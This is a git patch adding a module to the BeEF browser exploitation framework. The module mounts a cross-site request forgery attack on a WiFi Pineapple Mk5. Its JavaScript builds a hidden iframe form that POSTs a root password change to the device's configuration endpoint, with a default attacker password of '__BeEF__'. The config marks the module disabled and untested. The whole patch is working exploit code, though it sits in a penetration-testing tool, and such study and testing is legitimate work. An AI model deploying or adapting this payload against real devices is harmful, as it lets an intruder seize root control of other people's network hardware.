From bece5c143855f24a85ca1017d1efc6a265910de0 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Mon, 30 Dec 2013 07:58:07 +1030
Subject: [PATCH] Add wifi_pineapple_csrf module (untested and disabled)

---
 .../exploits/wifi_pineapple_csrf/command.js   | 26 +++++++++++++++++++
 .../exploits/wifi_pineapple_csrf/config.yaml  | 15 +++++++++++
 .../exploits/wifi_pineapple_csrf/module.rb    | 19 ++++++++++++++
 3 files changed, 60 insertions(+)
 create mode 100644 modules/exploits/wifi_pineapple_csrf/command.js
 create mode 100644 modules/exploits/wifi_pineapple_csrf/config.yaml
 create mode 100644 modules/exploits/wifi_pineapple_csrf/module.rb

diff --git a/modules/exploits/wifi_pineapple_csrf/command.js b/modules/exploits/wifi_pineapple_csrf/command.js
new file mode 100644
index 000000000..f1f59467a
--- /dev/null
+++ b/modules/exploits/wifi_pineapple_csrf/command.js
@@ -0,0 +1,26 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var gateway = '<%= @base %>'; 
+  var passwd  = '<%= @password %>';
+  var timeout = 15;
+
+  var wifi_pineapple_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "/components/system/configuration/functions.php?change_password", "POST", [
+    {'type':'hidden', 'name':'password',  'value':passwd} ,
+    {'type':'hidden', 'name':'repeat',    'value':passwd},
+    {'type':'hidden', 'name':'change_password', 'value':'Change Password'}
+  ]);
+
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(wifi_pineapple_iframe_<%= @command_id %>);
+  }
+  setTimeout("cleanup()", timeout*1000);
+
+});
+
diff --git a/modules/exploits/wifi_pineapple_csrf/config.yaml b/modules/exploits/wifi_pineapple_csrf/config.yaml
new file mode 100644
index 000000000..dd6b0fdd6
--- /dev/null
+++ b/modules/exploits/wifi_pineapple_csrf/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        wifi_pineapple_csrf:
+            enable: false
+            category: "Exploits"
+            name: "WiFi Pineapple Root Password CSRF"
+            description: "Attempts to change the root password on a WiFi Pineapple Mk5.<br/><br/>This module has not been tested."
+            authors: ["n0x00"]
+            target:
+                unknown: ["ALL"]
diff --git a/modules/exploits/wifi_pineapple_csrf/module.rb b/modules/exploits/wifi_pineapple_csrf/module.rb
new file mode 100644
index 000000000..5130a0895
--- /dev/null
+++ b/modules/exploits/wifi_pineapple_csrf/module.rb
@@ -0,0 +1,19 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Wifi_pineapple_csrf < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://172.16.42.1:1417/'}, 
+			{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end